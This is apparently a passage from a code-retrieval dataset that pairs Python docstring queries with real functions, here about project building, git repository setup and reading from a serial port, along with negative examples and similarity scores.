"def build_backbone(self):\n backbone = self.arch.backbone\n self.backbone = build_blocks(backbone, 'backbone')",
"def generate_build_file(startpath, outfilename='build.yml'):\n buildfiles = {}\n buildtables = {}\n\n def file_node(ext, fullpath):\n return fullpath\n\n def table_node(ext, fullpath):\n return [ext.lower(), fullpath]\n\n def add_to_contents(contents, nodefunc, path, files):\n try:\n safepath = [_pythonize_name(d) if d != '.' else '.' for d in path]\n except BuildException:\n warning = \"Warning: could not determine a Python-legal name for {path}; skipping.\"\n print(warning.format(path=os.sep.join(path)))\n return\n\n ptr = contents\n for folder in safepath:\n ptr = ptr.setdefault(folder, {})\n\n for file in files:\n fullpath = os.path.join(os.path.join(*path), file)\n name, ext = splitext_no_dot(file)\n ptr[_pythonize_name(name)] = nodefunc(ext, fullpath)\n\n for root, dirs, files in os.walk(startpath):\n # skip hidden directories\n for d in dirs:\n if d.startswith('.') or d == PACKAGE_DIR_NAME:\n dirs.remove(d)\n\n rel_path = os.path.relpath(root, startpath)\n path = rel_path.split(os.sep)\n\n tablefiles = []\n rawfiles = []\n for file in files:\n # skip hidden files\n if file.startswith('.'):\n continue\n\n name, ext = splitext_no_dot(file)\n # separate files into tables and raw\n if ext.lower() in TARGET['pandas']:\n tablefiles.append(file)\n else:\n rawfiles.append(file)\n\n if rawfiles:\n add_to_contents(buildfiles, file_node, path, rawfiles)\n\n if tablefiles:\n add_to_contents(buildtables, table_node, path, tablefiles)\n\n for contents in [buildfiles, buildtables]:\n for node in ['.', '..']:\n if node in contents:\n for key in contents[node]:\n contents[key] = contents[node][key]\n del contents[node]\n\n contents = dict(files=buildfiles, tables=buildtables)\n buildfilepath = os.path.join(startpath, outfilename)\n with open(buildfilepath, 'w') as outfile:\n yaml.dump(contents, outfile)\n return buildfilepath",
"def do(args):\n worktree = qisys.parsers.get_worktree(args)\n\n project_name = args.project_name\n project_path = os.path.join(os.getcwd(), project_name)\n\n if os.path.exists(project_path):\n raise Exception(\"%s already exists\" % project_path)\n os.mkdir(project_path)\n copy_helper(project_name, project_path)\n\n if args.git:\n qisys.command.call([\"git\", \"init\"], cwd=project_path)\n with open(os.path.join(project_path, \".gitignore\"), \"w\") as fp:\n fp.write(\"build-*\\n\")\n qisys.command.call([\"git\" , \"add\" , \".\"], cwd=project_path)\n qisys.command.call([\"git\" , \"commit\" , \"-m\" , \"initial commit\"], cwd=project_path)\n\n ui.info(ui.green, \"New project initialized in\", ui.bold, project_path)\n worktree.add_project(project_path)\n return worktree.get_project(project_path)",
"def build():\n local('vagrant up')",
"def __gitCreateArchive(self):\n self.vcs.gitCreateArchive(self.project.getProjectPath())",
"def build(which):\n return subprocess.Popen([p['paths']['w2l'],'obj',os.path.abspath(which)]).wait()",
"def dlimport_workdir(basedir):\r\n return tempfile.mkdtemp(dir=basedir)",
"def new(root: str = \".\", name: str = \"piccolo_project\"):\n tree = os.walk(TEMPLATE_DIR)\n\n router = get_routing_framework()\n\n template_context = {\n \"router\": router,\n \"router_dependencies\": ROUTER_DEPENDENCIES.get(router) or [router],\n \"server\": get_server(),\n \"project_identifier\": name.replace(\" \", \"_\").lower(),\n }\n\n for directory in tree:\n dir_path, sub_dir_names, file_names = directory # type: ignore\n\n output_dir_path = os.path.join(root, dir_path.split(TEMPLATE_DIR)[-1])\n\n if not os.path.exists(output_dir_path):\n folder_name = output_dir_path.split(\"/\")[-1]\n if folder_name.startswith((\"_\", \".\")):\n continue\n os.mkdir(dir_path)\n\n for sub_dir_name in sub_dir_names:\n if sub_dir_name.startswith(\"_\"):\n continue\n\n sub_dir_path = os.path.join(output_dir_path, sub_dir_name)\n if not os.path.exists(sub_dir_path):\n os.mkdir(sub_dir_path)\n\n for file_name in file_names:\n if file_name.startswith(\"_\") and file_name != \"__init__.py.jinja\":\n continue\n\n extension = file_name.rsplit(\".\")[0]\n if extension in (\"pyc\",):\n continue\n\n if file_name.endswith(\".jinja\"):\n output_file_name = file_name.replace(\".jinja\", \"\")\n template = Environment(\n loader=FileSystemLoader(searchpath=dir_path)\n ).get_template(file_name)\n\n output_contents = template.render(**template_context)\n\n if output_file_name.endswith(\".py\"):\n try:\n output_contents = black.format_str(\n output_contents,\n mode=black.FileMode(line_length=80),\n )\n except Exception as exception:\n print(f\"Problem processing {output_file_name}\")\n raise exception from exception\n\n with open(\n os.path.join(output_dir_path, output_file_name), \"w\"\n ) as f:\n f.write(output_contents)\n else:\n if file_name.endswith(\".jinja_raw\"):\n output_file_name = file_name.replace(\n \".jinja_raw\", \".jinja\"\n )\n else:\n output_file_name = file_name\n\n shutil.copy(\n os.path.join(dir_path, file_name),\n os.path.join(output_dir_path, output_file_name),\n )\n\n print(\n \"Run `pip install -r requirements.txt` and `python main.py` to get \"\n \"started.\"\n )",
"def init_git(self):\n self.git.spawn_with(lambda x: x.arg('init'))\n self.git.add_files('Enzi.toml')\n\n # add .gitignore\n gitignore = os.path.join(self.path, '.gitignore')\n with open(gitignore, 'w') as f:\n f.write('# ignore Enzi build directory\\n')\n f.write('build/\\n')\n self.git.add_files('.gitignore')",
"def cd_genny_root():\n script_path = os.path.abspath(__file__)\n script_dir = os.path.dirname(script_path)\n # cd into script directory first so we can get the project root with git.\n os.chdir(script_dir)\n root = get_project_root()\n os.chdir(root)",
"def generate(ctx, directory):\n ctx.ensure_object(dict)\n\n ctx.obj['scoped_context'] = {\n 'verbose': ctx.obj['verbose'],\n 'force': ctx.obj['force'],\n 'dry': ctx.obj['dry'],\n }\n\n ctx.obj['project_files'] = FileHandler.find_files(\n path=directory or os.getcwd(),\n patterns=['apps.py']\n )\n\n if not inside_app_directory(ctx, exit_on_error=not ctx.obj['force']):\n raise click.Abort",
"def generate(repo_dir, context, update):\n\n result = generate_files(\n repo_dir=repo_dir,\n context=context,\n overwrite_if_exists=update,\n skip_if_file_exists=not update,\n output_dir='.',\n )\n return result",
"def __init__(\n self,\n path: Optional[PathLike] = None,\n odbt: Type[LooseObjectDB] = GitCmdObjectDB,\n search_parent_directories: bool = False,\n expand_vars: bool = True,\n ) -> None:\n\n epath = path or os.getenv(\"GIT_DIR\")\n if not epath:\n epath = os.getcwd()\n if Git.is_cygwin():\n # Given how the tests are written, this seems more likely to catch\n # Cygwin git used from Windows than Windows git used from Cygwin.\n # Therefore changing to Cygwin-style paths is the relevant operation.\n epath = cygpath(epath)\n\n epath = epath or path or os.getcwd()\n if not isinstance(epath, str):\n epath = str(epath)\n if expand_vars and re.search(self.re_envvars, epath):\n warnings.warn(\n \"The use of environment variables in paths is deprecated\"\n + \"\\nfor security reasons and may be removed in the future!!\"\n )\n epath = expand_path(epath, expand_vars)\n if epath is not None:\n if not os.path.exists(epath):\n raise NoSuchPathError(epath)\n\n ## Walk up the path to find the `.git` dir.\n #\n curpath = epath\n git_dir = None\n while curpath:\n # ABOUT osp.NORMPATH\n # It's important to normalize the paths, as submodules will otherwise initialize their\n # repo instances with paths that depend on path-portions that will not exist after being\n # removed. It's just cleaner.\n if is_git_dir(curpath):\n git_dir = curpath\n # from man git-config : core.worktree\n # Set the path to the root of the working tree. If GIT_COMMON_DIR environment\n # variable is set, core.worktree is ignored and not used for determining the\n # root of working tree. This can be overridden by the GIT_WORK_TREE environment\n # variable. The value can be an absolute path or relative to the path to the .git\n # directory, which is either specified by GIT_DIR, or automatically discovered.\n # If GIT_DIR is specified but none of GIT_WORK_TREE and core.worktree is specified,\n # the current working directory is regarded as the top level of your working tree.\n self._working_tree_dir = os.path.dirname(git_dir)\n if os.environ.get(\"GIT_COMMON_DIR\") is None:\n gitconf = self._config_reader(\"repository\", git_dir)\n if gitconf.has_option(\"core\", \"worktree\"):\n self._working_tree_dir = gitconf.get(\"core\", \"worktree\")\n if \"GIT_WORK_TREE\" in os.environ:\n self._working_tree_dir = os.getenv(\"GIT_WORK_TREE\")\n break\n\n dotgit = osp.join(curpath, \".git\")\n sm_gitpath = find_submodule_git_dir(dotgit)\n if sm_gitpath is not None:\n git_dir = osp.normpath(sm_gitpath)\n\n sm_gitpath = find_submodule_git_dir(dotgit)\n if sm_gitpath is None:\n sm_gitpath = find_worktree_git_dir(dotgit)\n\n if sm_gitpath is not None:\n git_dir = expand_path(sm_gitpath, expand_vars)\n self._working_tree_dir = curpath\n break\n\n if not search_parent_directories:\n break\n curpath, tail = osp.split(curpath)\n if not tail:\n break\n # END while curpath\n\n if git_dir is None:\n raise InvalidGitRepositoryError(epath)\n self.git_dir = git_dir\n\n self._bare = False\n try:\n self._bare = self.config_reader(\"repository\").getboolean(\"core\", \"bare\")\n except Exception:\n # lets not assume the option exists, although it should\n pass\n\n try:\n common_dir = (Path(self.git_dir) / \"commondir\").read_text().splitlines()[0].strip()\n self._common_dir = osp.join(self.git_dir, common_dir)\n except OSError:\n self._common_dir = \"\"\n\n # adjust the wd in case we are actually bare - we didn't know that\n # in the first place\n if self._bare:\n self._working_tree_dir = None\n # END working dir handling\n\n self.working_dir: PathLike = 
self._working_tree_dir or self.common_dir\n self.git = self.GitCommandWrapperType(self.working_dir)\n\n # special handling, in special times\n rootpath = osp.join(self.common_dir, \"objects\")\n if issubclass(odbt, GitCmdObjectDB):\n self.odb = odbt(rootpath, self.git)\n else:\n self.odb = odbt(rootpath)",
"def generate(env):\n## doxyfile_scanner = env.Scanner(## DoxySourceScan,\n## \"DoxySourceScan\",\n## scan_check = DoxySourceScanCheck,\n##)\n\n if targz.exists(env):\n srcdist_builder = targz.makeBuilder(srcDistEmitter)\n\n env['BUILDERS']['SrcDist'] = srcdist_builder",
"def make_source_dir():\n\n os.makedirs(files['source_dir'].rel)",
"def build(self):\n \n # create db with empty tables\n dbpath, config = self.setup()\n \n # avoid work if setup decided db exists and build can be skipped\n if dbpath is None:\n return \n \n # check prerequisite files \n obopath = check_file(config.obo, dbpath, \"obo\")\n refpath = check_file(config.reference_phenotypes, dbpath, \n \"reference_phenotypes\")\n freqpath = check_file(config.phenotype_frequencies, dbpath,\n \"phenotype_frequencies\")\n\n self.logger.msg1(\"Loading ontology\") \n obo = MinimalObo(obopath, True)\n \n self.logger.msg1(\"Preparing phenotype frequencies\")\n fill_phenotype_frequency_table(dbpath, freqpath)\n \n # fill database with data\n self.logger.msg1(\"Preparing references\")\n fill_concise_reference_table(dbpath, refpath) \n fill_complete_reference_table(dbpath, obo, config) \n \n self._end()",
"def dest_repo_tree(dest_repo_no_tree):\n repo = dest_repo_no_tree\n\n # Create and commit a file\n fpath = os.path.join(repo.working_dir, \"something.txt\")\n with open(fpath, \"w\") as f:\n f.write(\"Mundul vult decipi, ergo decipiatur.\")\n repo.index.add([fpath])\n repo.index.commit(\"Dummy commit\")\n\n yield repo",
"def init(\n cls,\n path: Union[PathLike, None] = None,\n mkdir: bool = True,\n odbt: Type[GitCmdObjectDB] = GitCmdObjectDB,\n expand_vars: bool = True,\n **kwargs: Any,\n ) -> \"Repo\":\n if path:\n path = expand_path(path, expand_vars)\n if mkdir and path and not osp.exists(path):\n os.makedirs(path, 0o755)\n\n # git command automatically chdir into the directory\n git = cls.GitCommandWrapperType(path)\n git.init(**kwargs)\n return cls(path, odbt=odbt)",
"def build(self, gyp_file, target=None, **kw):\n raise NotImplementedError",
"def build_a_bear():\n if os.path.isdir(c.BEAR_PREFIX):\n logging.debug(\"skipping Bear installation\")\n return\n\n # download\n if not os.path.isfile(c.BEAR_ARCHIVE):\n curl = get_cmd_or_die(\"curl\")\n curl['-s', c.BEAR_URL, '-o', c.BEAR_ARCHIVE] & pb.TEE\n\n # remove any existing build dir since we don't know if\n # bear was built for the current host environment.\n if os.path.isdir(c.BEAR_SRC):\n shutil.rmtree(c.BEAR_SRC, ignore_errors=True)\n\n # unpack\n tar = get_cmd_or_die(\"tar\")\n with pb.local.cwd(c.DEPS_DIR):\n tar['xf', c.BEAR_ARCHIVE] & pb.TEE\n\n # cmake\n bear_build_dir = os.path.join(c.BEAR_SRC, \"build\")\n bear_install_prefix = \"-DCMAKE_INSTALL_PREFIX=\" + c.BEAR_PREFIX\n ensure_dir(bear_build_dir)\n with pb.local.cwd(bear_build_dir):\n cmake = get_cmd_or_die(\"cmake\")\n cmake[\"..\", bear_install_prefix] & pb.TEE\n make = get_cmd_or_die(\"make\")\n make[\"install\"] & pb.TEE",
"def build(self):\n raise NotImplementedError(\"This should have been implemented.\")",
"def test_build(self):\r\n self.mkbundle('file1', 'file2', output=\"out\").build()\r\n assert self.get(\"media/out\") == \"foo\\nbar\"",
"def make_package(tmp_path, pyproject_toml):\n return make_package_base(tmp_path, pyproject_toml)",
"def build(self, source_dir_path, output_path):\n env = {}\n env.update(self.osutils.environ)\n env.update({\"GOOS\": \"linux\", \"GOARCH\": self.goarch})\n runtime_path = self.binaries[self.LANGUAGE].binary_path\n cmd = [runtime_path, \"build\"]\n if self.trim_go_path:\n LOG.debug(\"Trimpath requested: Setting go build configuration to -trimpath\")\n cmd += [\"-trimpath\"]\n if self.mode and self.mode.lower() == BuildMode.DEBUG:\n LOG.debug(\"Debug build requested: Setting configuration to Debug\")\n cmd += [\"-gcflags\", \"all=-N -l\"]\n cmd += [\"-o\", output_path, source_dir_path]\n\n p = self.osutils.popen(cmd, cwd=source_dir_path, env=env, stdout=self.osutils.pipe, stderr=self.osutils.pipe)\n out, err = p.communicate()\n\n if p.returncode != 0:\n LOG.debug(err.decode(\"utf8\").strip())\n LOG.debug(\"Go files not found. Attempting to build for Go files in a different directory\")\n process, p_out, p_err = self._attempt_to_build_from_handler(cmd, source_dir_path, env)\n if process.returncode != 0:\n raise BuilderError(message=p_err.decode(\"utf8\").strip())\n return p_out.decode(\"utf8\").strip()\n\n return out.decode(\"utf8\").strip()",
"def build(buildout=None, newest=False):\n n = 'n' if newest else 'N'\n with cd(path()):\n if not buildout: # then use the deployment config\n buildout = '../{buildout}'.format(buildout=deploy_cfg())\n if not remote_exists(buildout, use_sudo=True):\n buildout = buildout[3:]\n sudo('bin/buildout -{n} -c {buildout}'.format(buildout=buildout, n=n),\n user=env.account)",
"def file(c, path=local.http_path):\r\n c = conn(c)\r\n print(\"make file repo on {}, path [{}]\".format(c.host, path))\r\n\r\n system.install(c, 'createrepo')\r\n c.run('createrepo {}'.format(path))",
"def __gitBundle(self):\n self.vcs.gitBundle(self.project.getProjectPath())",
"def create_branch(self):\n os.chdir(str(self.repository_path))\n sh.git.checkout('master')\n sh.git.checkout('-b', self.branch)\n logger.debug('Branch {} created', self.branch)",
"def b2d(homedir, branch):\n return os.path.join(homedir, 'integ', branch, 'integ')",
"def bundle(self):\n with tempfile.TemporaryDirectory(dir=self.tmp_dir) as tmp_dir:\n bundle_dir = join(tmp_dir, 'bundle')\n make_dir(bundle_dir)\n\n for fn in self.config.backend.get_bundle_filenames():\n path = download_if_needed(\n join(self.config.train_uri, fn), tmp_dir)\n shutil.copy(path, join(bundle_dir, fn))\n\n if file_exists(self.config.analyze_uri, include_dir=True):\n sync_to_dir(self.config.analyze_uri, join(\n bundle_dir, 'analyze'))\n\n path = download_if_needed(self.config.get_config_uri(), tmp_dir)\n shutil.copy(path, join(bundle_dir, 'pipeline-config.json'))\n\n model_bundle_uri = self.config.get_model_bundle_uri()\n model_bundle_path = get_local_path(model_bundle_uri, self.tmp_dir)\n zipdir(bundle_dir, model_bundle_path)\n upload_or_copy(model_bundle_path, model_bundle_uri)",
"def build():\n local('python' + python_version + ' setup.py bdist_egg')",
"def branched_repo(tmp_path_factory):\n tmpdir = tmp_path_factory.mktemp(\"branched_repo\")\n git_repo = GitRepoFixture.create_repository(tmpdir)\n git_repo.add(\n {\n \"del_master.py\": \"original\",\n \"del_branch.py\": \"original\",\n \"del_index.py\": \"original\",\n \"del_worktree.py\": \"original\",\n \"mod_master.py\": \"original\",\n \"mod_branch.py\": \"original\",\n \"mod_both.py\": \"original\",\n \"mod_same.py\": \"original\",\n \"keep.py\": \"original\",\n },\n commit=\"Initial commit\",\n )\n branch_point = git_repo.get_hash()\n git_repo.add(\n {\n \"del_master.py\": None,\n \"add_master.py\": \"master\",\n \"mod_master.py\": \"master\",\n \"mod_both.py\": \"master\",\n \"mod_same.py\": \"same\",\n },\n commit=\"master\",\n )\n git_repo.create_branch(\"branch\", branch_point)\n git_repo.add(\n {\n \"del_branch.py\": None,\n \"mod_branch.py\": \"branch\",\n \"mod_both.py\": \"branch\",\n \"mod_same.py\": \"same\",\n },\n commit=\"branch\",\n )\n git_repo.add(\n {\"del_index.py\": None, \"add_index.py\": \"index\", \"mod_index.py\": \"index\"}\n )\n (git_repo.root / \"del_worktree.py\").unlink()\n (git_repo.root / \"add_worktree.py\").write_bytes(b\"worktree\")\n (git_repo.root / \"mod_worktree.py\").write_bytes(b\"worktree\")\n return git_repo",
"def fresh_directory():\n os.chdir(tempfile.mkdtemp())",
"def _build(self):\n raise NotImplementedError()",
"def build_tree(self):\n active = self.get_active()\n family = self.dbstate.db.get_family_from_handle(active)\n self.goto_handle(handle=family)"
] | [
"0.59951997",
"0.5941467",
"0.58681095",
"0.5856485",
"0.57614243",
"0.5617354",
"0.5611247",
"0.5596623",
"0.558593",
"0.5584332",
"0.5543917",
"0.5542992",
"0.54703754",
"0.544997",
"0.544899",
"0.54458034",
"0.5438347",
"0.54342854",
"0.54192024",
"0.5414548",
"0.5387722",
"0.53791815",
"0.5356261",
"0.53389066",
"0.5333958",
"0.5315344",
"0.5293159",
"0.5242",
"0.5220701",
"0.5203907",
"0.5148621",
"0.51422024",
"0.5125289",
"0.51201195",
"0.51104254",
"0.5109865",
"0.5104615",
"0.5090442",
"0.5078938",
"0.50752383",
"0.50712955",
"0.50712955",
"0.5062582",
"0.505916",
"0.50382864",
"0.5037849",
"0.5034091",
"0.5033202",
"0.5031987",
"0.503083",
"0.5014627",
"0.5014627",
"0.50139487",
"0.5003795",
"0.49933693",
"0.4990424",
"0.49887413",
"0.4983308",
"0.4978359",
"0.4976066",
"0.4975368",
"0.49716315",
"0.49677113",
"0.49663535",
"0.49499708",
"0.49466112",
"0.49436212",
"0.49189246",
"0.49080104",
"0.4901853",
"0.489447",
"0.48932713",
"0.4892421",
"0.4891708",
"0.4889511",
"0.4871684",
"0.48709378",
"0.48707587",
"0.48667017",
"0.48608962",
"0.486034",
"0.4844849",
"0.48421755",
"0.48364314",
"0.48334193",
"0.48330128",
"0.48255265",
"0.48234943",
"0.4820455",
"0.48192635",
"0.48183712",
"0.4816425",
"0.48150423",
"0.48135266",
"0.48121986",
"0.4809994",
"0.48033762",
"0.48026362",
"0.47949624",
"0.47942722"
] | 0.7293197 | 0 |
Read data from the serial interface. | def s_read(self, timeout = 1):
    if self.s.is_open:
        data = []
        b = bytearray()
        try:
            self.s.timeout = 3
            data = self.s.read(1)
            if not len(data):
                return b
            self.s.timeout = .04
            data += self.s.read(500)
        except Exception as e:
            print("Could not read from port" + str(e))
        start = data.find(b'\x7e')
        end = data.find(b'\x7f')
        txt_start = b''
        txt_end = b''
        if start < 0:
            txt_start = data
        elif end < 0:
            txt_start = data
        else:
            txt_start = data[0:start]
            txt_end = data[end+1:]
        txt = txt_start + txt_end
        if len(txt):
            if self.log_ascii:
                self.logfile.write(txt)
            # End logging
        if Connection.START_UP_STRING in data:
            raise Reset_Exception('ChipSHOUTER unit has reset - wait 5 seconds then reinitialize.')
        if start < 0 or end < 0 or end < start:
            b = bytearray()
            return b
        if self.log_input:
            self.logfile.write('\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\n')
        b.extend(data[start:end])
        return b
    else:
        raise IOError('Comport is not open, use ctl_connect()') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _serial_read(self, size):\n self.write([self.SERIAL_IO])\n resp = self.read(size)\n data = self.decode(resp)\n return data",
"def read_from_serial(self):\n self.running = True\n while self.running:\n data = self.serial.readline().decode()\n if \"DATA\" not in data:\n print(\"ERREUR : {}\".format(data))\n continue\n\n try:\n _, hum, tem = data.split(\" \")\n hum = float(hum)\n tem = float(tem)\n except Exception as e:\n print(\"ERREUR : ligne nulle {}\".format(e))\n else:\n self.data.append([datetime.datetime.now(), hum, tem])",
"def read_buffer(serial):\r\n resp = serial.read_all()\r\n return resp.decode()",
"def read_serial_data(self):\n qdata = list(get_all_from_queue(self.data_q))\n if len(qdata) > 0:\n data = self.data+''.join(qdata)\n while data.find(\"Id: \")!=-1:\n msgStart = data.find(\"Id: \")\n msgEnd = data.find(\"\\n\",msgStart)\n if msgEnd == -1:\n break\n\n packet = data[msgStart:msgEnd-1]\n # print \"msg: [%s]\" % packet\n msgId = int(packet[4:8],16)\n # print \"msgId: %d [%x]\" % (msgId, msgId)\n msgData = map(lambda x: int(x,16) ,packet[16:].split(\" \"))\n # print \"data: \", msgData\n self.update_data(msgId, msgData)\n\n data = data[msgEnd:]\n self.data = data",
"def read_from_serial(self):\n output = b''\n time.sleep(self._sleep_time)\n while self._ser.inWaiting() > 0:\n output = output + self._ser.read(1)\n #A default ten powercycle delay means that some measurements may still be processing\n #by the time the read function is called. This slows down the read but ensures that\n #it will finish (per my testing). There is probably a better way to do this. TODO\n time.sleep(0.06)\n return output.decode('utf-8').strip()",
"def read_serial_data(serial):\n serial.flushInput()\n \n serial_data = []\n readings_left = True\n timeout_reached = False\n \n while readings_left and not timeout_reached:\n serial_line = serial.readline()\n if serial_line == '':\n timeout_reached = True\n else:\n serial_data.append(serial_line)\n if len(serial_data) == max_num_readings:\n readings_left = False\n \n return serial_data",
"def run(self):\n self.read_from_serial()",
"def reader(self):\n while self.alive:\n try:\n if controlEvent.isSet() == False:\n break\n data = self.serial.read(1) # read one, blocking\n n = self.serial.inWaiting() # look if there is more\n if n:\n data = data + self.serial.read(n) # and get as much as possible\n if data:\n # the spy shows what's on the serial port, so log it before converting newlines\n if self.spy:\n sys.stdout.write(codecs.escape_encode(data)[0])\n sys.stdout.flush()\n #if self.ser_newline and self.net_newline:\n # do the newline conversion\n # XXX fails for CR+LF in input when it is cut in half at the begin or end of the string\n #data = net_newline.join(data.split(ser_newline))\n # escape outgoing data when needed (Telnet IAC (0xff) character)\n self._write_lock.acquire()\n try:\n # Only send data to socket if it is in active state\n if controlEvent.isSet() == True:\n self.socket.sendall(data) # send it over TCP\n except Exception, msg:\n sys.stderr.write('reader Socket ERROR IOError: %s\\n' % msg)\n finally:\n self._write_lock.release()\n except IOError, msg:\n sys.stderr.write('reader ERROR IOError: %s\\n' % msg)\n break\n except socket.error, msg:\n sys.stderr.write('reader ERROR socket.error: %s\\n' % msg)\n break\n except Exception, msg:\n sys.stderr.write('reader ERROR Other Exception: %s\\n' % msg)\n break",
"def read_and_print(serial):\r\n resp = read_buffer(serial)\r\n if resp != \"\":\r\n print(resp)",
"def serial_read(useParse=False, header='$', tail='#'):\n global ser, recvBuff, startRecord\n retData = ''\n if useParse:\n if ser.readable():\n while ser.inWaiting():\n c = ser.read(1)\n if c == header:\n startRecord = True\n recvBuff = ''\n elif c == tail:\n startRecord = False\n if recvBuff != '':\n #print 'I get: ', recvBuff\n retData = recvBuff\n elif startRecord:\n recvBuff += c\n else:\n pass\n else:\n print 'The serial', ser.portstr, 'cannot be read.'\n pass\n else:\n if ser.readable():\n while ser.inWaiting():\n retData += ser.read(1)\n else:\n print 'The serial', ser.portstr, 'cannot be read.'\n pass\n return retData",
"def worker_serial_read(self):\r\n while self.active_flag.is_set():\r\n if not self.data_recieved_flag.is_set() and self.serial_data.in_waiting > 0:\r\n # strtmp=self.serial_data.read_until(b'\\x02\\x01\\x04\\x03\\x06\\x05\\x08\\x07');\r\n strtmp = self.serial_data.read_all()\r\n if (strtmp != b''):\r\n # self.buffer_busy_flag.wait();\r\n self.buffer_busy_flag.clear()\r\n # self.recieved_data=[self.recieved_data,strtmp];\r\n self.recieved_data = strtmp\r\n self.buffer_busy_flag.set()\r\n self.data_recieved_flag.set()\r\n else:\r\n time.sleep(0.001)\r\n\r\n return",
"def readline(self):\n try:\n output = self.ser.readline()\n return output\n except SerialException as se:\n log.debug('Serial connection read error: {}'.format(se))\n return None",
"def _read_v1(self):\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.interface, self.usb_rd_timeout)",
"def read(self):\n try:\n while self.Serial.in_waiting:\n c = self.Serial.read().decode()\n if c != \"\\n\":\n self.buffer += c\n else:\n return self.parse_telemetry()\n except:\n pass\n\n return None",
"def _read(self, timeout=None):\n\n # Developer notes:\n #\n # Packet data read from Serial is in this format:\n # [HDLC_FLAG_BYTE][Escaped data][HDLC_FLAG_BYTE]\n #\n # [Escaped data] is encoded so that [HDLC_FLAG_BYTE] byte\n # values cannot occur within it. When [Escaped data] has been\n # unescaped, the last 2 bytes are a 16-bit CRC of the earlier\n # part of the packet (excluding the initial HDLC_FLAG_BYTE\n # byte)\n #\n # It's also possible that the serial device was half-way\n # through transmitting a packet when this function was called\n # (app was just started). So we also neeed to handle this case:\n #\n # [Incomplete escaped data][HDLC_FLAG_BYTE][HDLC_FLAG_BYTE][Escaped data][HDLC_FLAG_BYTE]\n #\n # In this case we skip over the first (incomplete) packet.\n #\n\n if self._s.timeout != timeout and timeout != None:\n if self._debug:\n print \"Set the timeout to %s, previous one was %s\" % (timeout, self._s.timeout)\n self._s.timeout = timeout\n\n try:\n # Read bytes until we get to a HDLC_FLAG_BYTE value\n # (either the end of a packet, or the start of a new one)\n d = self._get_byte(timeout)\n ts = time.time()\n if self._debug and d != self.HDLC_FLAG_BYTE:\n print \"Skipping incomplete packet\"\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte(timeout)\n ts = time.time()\n\n # Store HDLC_FLAG_BYTE at the start of the retrieved packet\n # data:\n packet = [d]\n\n # Is the next byte also HDLC_FLAG_BYTE?\n d = self._get_byte(timeout)\n if d == self.HDLC_FLAG_BYTE:\n # Yes. This means that the previous byte was for\n # the end of the previous packet, and this byte is for\n # the start of the next packet.\n\n # Get the 2nd byte of the new packet:\n d = self._get_byte(timeout)\n ts = time.time()\n\n # We are now on the 2nd byte of the packet. Add it to\n # our retrieved packet data:\n packet.append(d)\n\n # Read bytes from serial until we read another\n # HDLC_FLAG_BYTE value (end of the current packet):\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte(timeout)\n packet.append(d)\n\n # Done reading a whole packet from serial\n if self._debug:\n print \"SimpleSerial:_read: unescaped\", packet\n\n # Decode the packet, and check CRC:\n packet = self._unescape(packet)\n\n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n\n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n raise ReadCRCError\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n\n # Packet was successfully retrieved, so return it in a\n # RawPacket wrapper object (but leave out the\n # HDLC_FLAG_BYTE and CRC bytes)\n return RawPacket(ts, packet[1:-3])\n except socket.timeout:\n raise ReadTimeoutError",
"def _serial_read(self, num_bytes):\n out = self.serial.read(num_bytes)\n if len(out) != num_bytes:\n self.log(\"WARNING: Didn't get the expected number of bytes\")\n self.log(\" Received {}, expected {}. Serial port dead?\".format(len(out), num_bytes))\n\n out_list = [int(v) for v in bytearray(out)]\n if self.verbose:\n self.log(\"Read in: {}\".format(\" \".join([\"{:0>2X}\".format(b) for b in out_list])))\n\n return out_list",
"def _read(self):\n while self._rxactive:\n try:\n rv = self._ep_in.read(self._ep_in.wMaxPacketSize)\n if self._isFTDI:\n status = rv[:2] # FTDI prepends 2 flow control characters,\n # modem status and line status of the UART\n if status[0] != 1 or status[1] != 0x60:\n log.info(\n \"USB Status: 0x{0:02X} 0x{1:02X}\".format(\n *status))\n rv = rv[2:]\n for rvi in rv:\n self._rxqueue.put(rvi)\n except usb.USBError as e:\n log.warn(\"USB Error on _read {}\".format(e))\n return\n \n time.sleep(self._rxinterval)",
"def read(self): \n s = \"\"\n \n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n\n l = self.ser.read(1) #Read 1 BYTE\n self.buffer.append(l)\n \n while len(self.buffer) > 0:\n s = s + self.buffer.popleft()\n\n return s",
"def _read_thread(self):\r\n\r\n while self._reading and self._serial_object:\r\n if self._serial_object.in_waiting:\r\n try:\r\n (raw_data, parsed_data) = self._ubxreader.read()\r\n # if raw_data:\r\n # print(raw_data)\r\n if parsed_data:\r\n print(parsed_data)\r\n except (\r\n ube.UBXStreamError,\r\n ube.UBXMessageError,\r\n ube.UBXTypeError,\r\n ube.UBXParseError,\r\n ) as err:\r\n print(f\"Something went wrong {err}\")\r\n continue",
"def data_available(self):\n\n self.run = True\n self.serial.reset_input_buffer()\n while self.run:\n if self.serial.in_waiting:\n data: str = self.serial.readline().decode(\"utf-8\")\n data = data.replace(\">>>\", \"\").lstrip()\n\n if len(data) > 0:\n self.output_text.config(state=NORMAL)\n self.output_text.insert(END, data)\n self.output_text.see(END)\n self.output_text.config(state=DISABLED)\n else:\n time.sleep(0.1)",
"def read_data(self):\n temperature_data = RS485.read_temperature(self.data_path)\n humidity_data = RS485.read_humidity(self.data_path)\n moisture_data = RH_010_GN.read_moisture(self.data_path)\n o2_data = LB_856.read_o2(self.data_path)\n co2_data = LB_856.read_co2(self.data_path)\n\n self.data = [temperature_data, humidity_data, moisture_data, o2_data, co2_data]",
